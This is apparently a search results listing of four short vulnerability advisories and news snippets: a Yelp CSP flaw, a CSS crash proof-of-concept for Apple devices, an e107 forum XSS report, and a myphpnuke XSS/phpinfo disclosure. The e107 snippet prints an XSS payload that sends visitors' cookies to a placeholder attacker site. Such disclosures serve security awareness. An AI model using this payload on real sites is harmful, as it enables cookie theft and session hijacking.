4 matches found
PT-2026-53247
Name of the Vulnerable Software and Affected Versions Yelp affected versions not specified Description A flaw exists due to an overly permissive Content Security Policy CSP implementation provided by yelp-xsl. A malicious Flatpak application can open crafted help content through the OpenURI porta...
CSS Attack Causes iOS, macOS Devices to Crash
A newly-revealed proof-of-concept attack can cause iOS devices to crash or restart with a mere 15 lines of code, a researcher disclosed over the weekend. On Saturday, researcher Sabri Haddouche, a security researcher at Wire, tweeted the source code of the proof-of-concept PoC attack that he said...
e107 WebPortal
Hello, Zaraza Type:CSS in forum/ LINK=http://www.site.ru" onclick=document.location.hef='http://hackersite/cgi-bin/cookiesniffer.cgi?'+document.cookie;target="blanksite.ru/LINK IMGjavascript:alert'HELLO, This CSS attack ;'/IMG -- Best regards, B4D$c0Rp mailto:[email protected] 01.06.2005, 22:49...
phpmynuke css and phpinfo() vuls
myphpnuke version 1.8.8final7 and prior that contain sysinfo are vulnerable to both css attack and phpinfo Disclosure. The problem is that unlike the rest of the scripts under /admin/, sysinfo's footer script called systemfooter.php does not check who the user is. Inside systemfooter.php the...